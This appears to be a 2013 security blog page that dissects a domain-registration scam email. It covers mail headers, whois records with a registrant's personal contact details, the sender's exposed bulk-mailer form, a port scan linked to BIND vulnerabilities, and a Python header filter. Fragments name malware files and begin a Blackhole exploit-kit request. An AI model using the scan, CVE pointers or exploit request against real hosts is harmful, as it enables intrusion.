<span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">exp1.tmp.exe | VirusTotal Detected as: PSW.Generic | Fareit | Zero Access 30/47</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">exp1.tmp</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">exp2.tmp</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><br /></span>
<br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">URLs Involved</span><br />
<div style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px;">
<br /></div>
<div style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px;">
<br /></div>
</div>
Let's Deep Dive a Domain Registration Scam Email<br />
Posted 2013-04-28<br />
<br />
Having an internet presence for so long, I have seen many of these.<br />
<br />
These emails use the BMX Mailer, with a Precedence field and online virtual fax numbers, and have some ties to a Romanian web server. The goal is to switch you to their "domain registration" service for an affordable $75/year lol.<br />
<br />
You only have to fax them a credit card form.<br />
<br />
Here's a copy of the email:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi91LDOwECQ9WikFqX1Xx4ZZCCG2AKS-ZvM0p1MmBj7q-ctxmXM9_LPgE5ODd5-RQ-blt5XD8dra8nOXRe4FE5wXHlNkLdGR-z9f5f_9NIdbi2BsAAFbYkFHSe63Ss4jkNYJUqvIIWynpQ/s1600/domain-renewal-junk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi91LDOwECQ9WikFqX1Xx4ZZCCG2AKS-ZvM0p1MmBj7q-ctxmXM9_LPgE5ODd5-RQ-blt5XD8dra8nOXRe4FE5wXHlNkLdGR-z9f5f_9NIdbi2BsAAFbYkFHSe63Ss4jkNYJUqvIIWynpQ/s400/domain-renewal-junk.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Sent from a hotmail address, so clearly legitimate</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTkHZEZD9RW_JQ9WOS_DEs8OPkrYQHassZEl8xQo3QTS1W9S9mZveFH2hFwIRrbEhj5Oydy0fTPTNVgHRhyXmPbp2TvteDvWQsNzVoV7m-dBOWFlZbYdZ9XDeBarxkUdY8TMpTnMoXf8Q/s1600/domain-renewal-junk-header.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTkHZEZD9RW_JQ9WOS_DEs8OPkrYQHassZEl8xQo3QTS1W9S9mZveFH2hFwIRrbEhj5Oydy0fTPTNVgHRhyXmPbp2TvteDvWQsNzVoV7m-dBOWFlZbYdZ9XDeBarxkUdY8TMpTnMoXf8Q/s640/domain-renewal-junk-header.PNG" width="640" /></a></div>
<br />
<div style="text-align: center;">
It is important to note that the message guarantees 100% satisfaction.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiYm68-XNfhRJxam7xmVutGVi51iK0rK84BokZDMIWkPVQUEx6556R5vHU5eq4lROPbnmpJ5fJGKvgD8slGZmwpxLy_y4MKKbmCNVs-4kHKEg_ttE2sT41Pn11hVSC2F_w7dzlI1OE2uc/s1600/domain-renewal-disclaimer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiYm68-XNfhRJxam7xmVutGVi51iK0rK84BokZDMIWkPVQUEx6556R5vHU5eq4lROPbnmpJ5fJGKvgD8slGZmwpxLy_y4MKKbmCNVs-4kHKEg_ttE2sT41Pn11hVSC2F_w7dzlI1OE2uc/s640/domain-renewal-disclaimer.PNG" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYCz22V4qm4iy_wwT4UQwp5G2k-TzEErua5I55vg98h2qpn8Q7VLKcv03KqOR3GrTg6g0IU5lgi52Ln22aHePlF3mOQe38nAlSpHm2XCTU_8-yC_J38EUdNyxZrJLxObcptTBzoI-O24/s1600/domain-renewal-junk-ip-lookup.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYCz22V4qm4iy_wwT4UQwp5G2k-TzEErua5I55vg98h2qpn8Q7VLKcv03KqOR3GrTg6g0IU5lgi52Ln22aHePlF3mOQe38nAlSpHm2XCTU_8-yC_J38EUdNyxZrJLxObcptTBzoI-O24/s1600/domain-renewal-junk-ip-lookup.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
So this hostname, email2u.us, comes back to a Romanian registration. Probably nothing suspicious here #scoff</div>
<br />
<br />
<span style="color: red;"><br /></span>
<br />
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Return-path: &lt;domainservicb73@hotmail.com&gt;</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Envelope-to: receiver@domain.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Delivery-date: Sat, 27 Apr 2013 18:54:15 -0500</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Received: from [<b>184.82.95.130</b>] (port=41871 helo=<b>host.kevinz.com</b>)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>by hosteddomain.com with esmtps (TLSv1:DHE-RSA-AES256-SHA:256)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>(Exim 4.80)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>(envelope-from &lt;<b>domainservicb73@hotmail.com</b>&gt;)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>id 1UWEwY-0001rX-K2</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>for receiver@domain.com; Sat, 27 Apr 2013 18:54:15 -0500</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Received: from <b>domainin</b> by h<b>ost.kevinz.com with local <a href="http://www.exim.org/">(Exim 4.80</a>)</b></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>(envelope-from <domainservicb73@hotmail.com>)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>id 1UWEwN-000189-VO</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>for receiver@domain.com; Sat, 27 Apr 2013 19:54:04 -0400</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">To: receiver@domain.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Subject: Domain Notification: JOE CITIZEN This is your Final Notice of Domain Listing - domain.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"><b>X-PHP-Script: 184.82.95.130/~domainin/info/mail_new2.php for 99.247.101.189 </b></span><br />
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;">(the PHP script seems to be common in these messages, and the 99. address is a Canadian address)</span><br />
<div style="color: #a83600;">
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">From: Domain Services <domainservicb73@hotmail.com></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">MIME-Version: 1.0</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Content-Type: text/html;</span></div>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><span style="color: #a83600;"><br /></span></b></span>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><span style="color: red;">X-Mailer: AT</span><span style="color: #a83600;"> </span>(undocumented X-mailer, seems to be a common string in these messages, see References)</b></span><br />
<div style="color: #a83600;">
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Priority: High</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Importance: High</span></div>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><span style="color: #a83600;"><br /></span></b></span>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><span style="color: #a83600;">Precedence: VBBV </span>(not generally used, see <a href="http://stackoverflow.com/questions/154718/precedence-header-in-email">This</a> and <a href="http://www.faqs.org/rfcs/rfc2076.html">RFC 2076</a> - <i>The Precedence in these messages appears always to be a 4 Letter Upper Case Code - might be good intelligence for spam blockers to check for</i>)</b></span><br />
<div style="color: #a83600;">
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Message-Id: <E1UWEwN-000189-VO@host.kevinz.com></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Date: Sat, 27 Apr 2013 19:54:03 -0400</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: This header was added to track abuse, please include it with any abuse report</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: Primary Hostname - host.kevinz.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: Original Domain - domain.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: Sender Address Domain - hotmail.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Get-Message-Sender-Via: host.kevinz.com: authenticated_id: domainin/only user confirmed/virtual account not confirmed</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Spam-Status: No, score=5.2</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Spam-Score: 52</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Spam-Bar: +++++</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Spam-Flag: NO</span></div>
<br />
<br />
<h3>
<b>Common Strings:</b></h3>
<br />
<ul>
<li>X-Mailer: AT</li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Precedence: (followed by a 4 Upper Case Letter Code)</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">/~domainin/info/mail_new2.php for </span><span style="font-family: Arial, Helvetica, sans-serif;"><ip address></span></li>
</ul>
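The three common strings listed above can be combined into a header fingerprint for a mail filter. This is an added example, not part of the original post: the function names, the two-of-three threshold and the benign sample are assumptions, and the two campaign samples are abridged from the headers quoted on this page.<br />

```python
import re
from email import message_from_string

# Values RFC 2076 lists for Precedence; compared case-insensitively so an
# upper-cased "BULK" from a legitimate list server does not trip the rule.
CONVENTIONAL_PRECEDENCE = {"bulk", "junk", "list"}

# "<host>/~domainin/info/mail_new2.php for <client ip>" as seen in X-PHP-Script.
PHP_SCRIPT_RE = re.compile(
    r"^(?P<host>\S+?)(?P<path>/~domainin/info/mail_new2\.php) for (?P<client>\S+)"
)


def campaign_indicators(raw_message):
    """Return a dict of the campaign strings found in the message headers."""
    msg = message_from_string(raw_message)
    hits = {}

    # Indicator 1: the literal, otherwise undocumented, X-Mailer value.
    if (msg.get("X-Mailer") or "").strip() == "AT":
        hits["x_mailer"] = "AT"

    # Indicator 2: Precedence made of exactly four upper-case letters.
    for value in msg.get_all("Precedence", []):
        value = value.strip()
        if re.fullmatch(r"[A-Z]{4}", value) and value.lower() not in CONVENTIONAL_PRECEDENCE:
            hits["precedence"] = value

    # Indicator 3: the bulk mailer script path, with sending host and operator IP.
    match = PHP_SCRIPT_RE.match((msg.get("X-PHP-Script") or "").strip())
    if match:
        hits["php_script"] = {"host": match["host"], "client": match["client"]}
    return hits


def is_campaign(raw_message, threshold=2):
    """Flag a message when at least `threshold` indicators are present (assumed value)."""
    return len(campaign_indicators(raw_message)) >= threshold


# Abridged from the 27 Apr 2013 headers on this page.
SAMPLE_APRIL = """\
Return-path: <domainservicb73@hotmail.com>
Subject: Domain Notification: JOE CITIZEN This is your Final Notice of Domain Listing - domain.com
X-PHP-Script: 184.82.95.130/~domainin/info/mail_new2.php for 99.247.101.189
From: Domain Services <domainservicb73@hotmail.com>
X-Mailer: AT
Precedence: VBBV

body
"""

# Abridged from the 22 Mar 2013 headers on this page.
SAMPLE_MARCH = """\
Return-Path: domainserhhjcb73@hotmail.com
X-PHP-Script: 209.198.1.90/~domainin/info/mail_new2.php for 99.237.121.36
From: Domain Services <domainserhhjcb73@hotmail.com>
X-Mailer: AT
Precedence: SSWD

body
"""

# Constructed benign message: upper-cased conventional Precedence, other mailer.
SAMPLE_BENIGN = """\
From: announce@example.org
X-Mailer: ExampleList 1.0
Precedence: BULK

body
"""

if __name__ == "__main__":
    for name, raw in [("april", SAMPLE_APRIL), ("march", SAMPLE_MARCH), ("benign", SAMPLE_BENIGN)]:
        print(name, is_campaign(raw), campaign_indicators(raw))
```

Requiring two of the three strings keeps a single coincidental match, such as another mailer that happens to identify itself as "AT", from flagging a message on its own.<br />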
<br />
Some digging around revealed some leaked information on the server, which is publicly accessible. This is a list of the "csv" files which have been uploaded to the server.<br />
<br />
<br />
<h3>
<b>Information Leakage in HTML Files:</b></h3>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px;">A host of csv files are leaked and identified on this server, including the following:</span></span><br />
<span style="color: #a83600; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px;"><br /></span></span>
<br />
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-23.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-24.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-25.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-26.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-27.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-28.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-29.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-30.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-31.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-32.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-33.csv</span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">
</span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">
</span></span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;">and there are a bunch more files like this. Nothing beats having 30 million+ emails to choose from.</span><br />
<br />
<h3>
184.82.95.130 Services</h3>
PORT STATE SERVICE VERSION<br />
53/tcp open domain ISC BIND 9.3.6-20.P1.el5_8.6<br />
1723/tcp closed pptp<br />
Device type: general purpose|firewall|proxy server|WAP<br />
<br />
<br />
FYI: <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-21860/ISC-Bind-9.3.0.html">http://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-21860/ISC-Bind-9.3.0.html</a><br />
<br />
<span style="background-color: #367e8e; color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: italic;">Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at 184.82.95.130 Port 80</span><br />
<span style="background-color: #367e8e; color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: italic;"><br /></span>
<br />
<h3>
<b>Information Leakage in Error Message:</b></h3>
<div>
<pre style="font-family: 'DejaVu Sans Mono', 'Courier New', Courier, Monaco, monospace; font-size: 12px; margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span>
<h1>404 Not Found</h1><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span>
Please forward this error screen to 184.82.95.130's <span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span>
<a href="<b>mailto:kevinz50@ymail.com</b>
WebMaster</a>.<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span>
</p><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span></pre>
</div>
<h3>
<b><br /></b></h3>
<h3>
<b>Centralops on email2u.us</b></h3>
<br />
<pre style="font-family: 'Courier New', monospace;"><span style="font-size: x-small;">Domain Name: EMAIL2U.US
Domain ID: D35316435-US
Sponsoring Registrar: ENOM, INC.
Sponsoring Registrar IANA ID: 48
Registrar URL (registration services): whois.enom.com
Domain Status: clientTransferProhibited
Registrant ID: 62EA327952C1BCAB
Registrant Name: Andrei Manoliu
Registrant Address1: atelierele noi
Registrant City: bucharest
Registrant State/Province: bucuresti
Registrant Postal Code: 014571
</span><b>Registrant Country: Romania
Registrant Country Code: RO</b><span style="font-size: x-small;">
Registrant Phone Number: +40.767801428
Registrant Email: slabeste2011@yahoo.com
Registrant Application Purpose: P1
Registrant Nexus Category: C12
Administrative Contact ID: EDAECA2EE634C95B
Administrative Contact Name: Andrei Manoliu
Administrative Contact Address1: atelierele noi
Administrative Contact City: bucharest
Administrative Contact State/Province: bucuresti
Administrative Contact Postal Code: 014571
Administrative Contact Country: Romania
Administrative Contact Country Code: RO
Administrative Contact Phone Number: +40.767801428
Administrative Contact Email: slabeste2011@yahoo.com</span></pre>
<br />
<br />
<h3>
<b>BMX Mailer</b></h3>
<br />
<br />
<pre style="font-family: 'DejaVu Sans Mono', 'Courier New', Courier, Monaco, monospace; font-size: 12px; margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<html><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<head><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><title>BMX : Bulk Mailer</title><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
</head><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<body><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<form name="mail" method="post" action="mail_new2.php"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<table width="60%" border="0" cellspacing="1" cellpadding="1" align="center" bgcolor=#DCDCDC><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<tr><td colspan=2><font face=arial size=2><strong>Bulk Mailer</strong></font></td></tr><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<tr> <span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<td align="right"><font face="Arial, Helvetica, sans-serif" size="2">Subject:</font></td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<td> <span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><select size="1" name="subjectid" style="width:250"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><option value="">-- Select -- <span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><option value=1><b><span style="color: red;">Domain Notification: {NAME} This is your Final Notice of Domain Listing - {WEBURL}<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span></select><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span></span></b>
</td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
</tr><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<tr><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<td align=right><font face=arial size=2>Select Group:</font></td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<select name="groupid"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<option value=0>-- Select --<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<option value=1>Domain Services</select><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
</td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span></pre>
<br />
<h3>
Others have gotten this and posted their headers. </h3>
<br />
<br />
From - Fri Mar 22 17:28:39 2013<br />
X-Account-Key: account2<br />
X-UIDL: 12219<br />
X-Mozilla-Status: 0001<br />
X-Mozilla-Status2: 00010000<br />
X-Mozilla-Keys:<br />
Return-Path: domainserhhjcb73@hotmail.com<br />
Received: from spoolbl10-d.mail.gandi.net ([217.70.178.90])<br />
by mail.brakstar.com<br />
; Fri, 22 Mar 2013 17:24:00 +0100<br />
Received: from mxcontact.gandi.net (mxcontact.gandi.net [217.70.177.36])<br />
by spoolbl10-d.mail.gandi.net (Postfix) with ESMTP id 0D8E795AE38<br />
for <societe@brakstar.com>; Fri, 22 Mar 2013 17:23:55 +0100 (CET)<br />
Received: from server1.ryansheppard.com (unknown [209.198.1.90])<br />
by mredir1-v.mgt.gandi.net (Postfix) with ESMTP id 4544EEC40A<br />
for <8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET>; Fri, 22 Mar 2013 17:23:55 +0100 (CET)<br />
Received: from domainin by server1.ryansheppard.com with local (Exim 4.80)<br />
(envelope-from <domainserhhjcb73@hotmail.com>)<br />
id 1UIy2y-00032y-JH<br />
for 8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET; Fri, 22 Mar 2013 05:14:00 -0400<br />
To: 8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET<br />
Subject: Domain Notification: SARL BRAKSTAR This is your Final Notice of Domain Listing - RATONIA.COM<br />
<br />
X-PHP-Script: 209.198.1.90/~domainin/info/mail_new2.php for 99.237.121.36 (Again Canadian IP Address)<br />
<br />
From: Domain Services <domainserhhjcb73@hotmail.com><br />
MIME-Version: 1.0<br />
Content-Type: text/html;<br />
<br />
X-Mailer: AT<br />
<br />
Priority: High<br />
Importance: High<br />
<br />
Precedence: SSWD<br />
<br />
Message-Id: <E1UIy2y-00032y-JH@server1.ryansheppard.com><br />
Date: Fri, 22 Mar 2013 05:14:00 -0400<br />
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report<br />
X-AntiAbuse: Primary Hostname - server1.ryansheppard.com<br />
X-AntiAbuse: Original Domain - contact.gandi.net<br />
X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]<br />
X-AntiAbuse: Sender Address Domain - hotmail.com<br />
X-Get-Message-Sender-Via: server1.ryansheppard.com: authenticated_id: domainin/only user confirmed/virtual account not confirmed<br />
X-Antivirus: avast! (VPS 130322-0, 22/03/2013), Inbound message<br />
X-Antivir<br />
<div>
<br /></div>
<br />
<br />
References:<br />
<a href="http://www.spamreg.com/reg495597.htm">http://www.spamreg.com/reg495597.htm</a><br />
<a href="http://www.ip-adress.com/whois/kevinz.com">http://www.ip-adress.com/whois/kevinz.com</a><br />
<a href="http://www.holmpage.com/2011/10/spam-alert-domain-notification-this-is-your-final-notice-of-domain-listing/">http://www.holmpage.com/2011/10/spam-alert-domain-notification-this-is-your-final-notice-of-domain-listing/</a><br />
<a href="http://www.webx.net/bmx/">http://www.webx.net/bmx/</a><br />
<a href="http://www.brakstar.com/forum/braktopic_22844.html">http://www.brakstar.com/forum/braktopic_22844.html</a><br />
<a href="http://www.elvey.com/spam/Domain_Services.html">http://www.elvey.com/spam/Domain_Services.html</a><br />
<br />
<h3>
<b>FTP JPG EXE as a Second Stage</b></h3>
Fort Knox Networks, published 2013-04-21T15:13:00.000-07:00, updated 2013-04-22T16:34:11.044-07:00<br />
<br />
Something somewhat interesting. Blackhole exploit at<br />
<br />
<br />
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;"> GET /forum/links/public_version.php?yf=30:31:32:2v:1f&qe=2v:1k:1m:32:33:1k:1k:31:
1j:1o&u=1f&hs=w&yy=e&jopa=6797956 HTTP/1.1
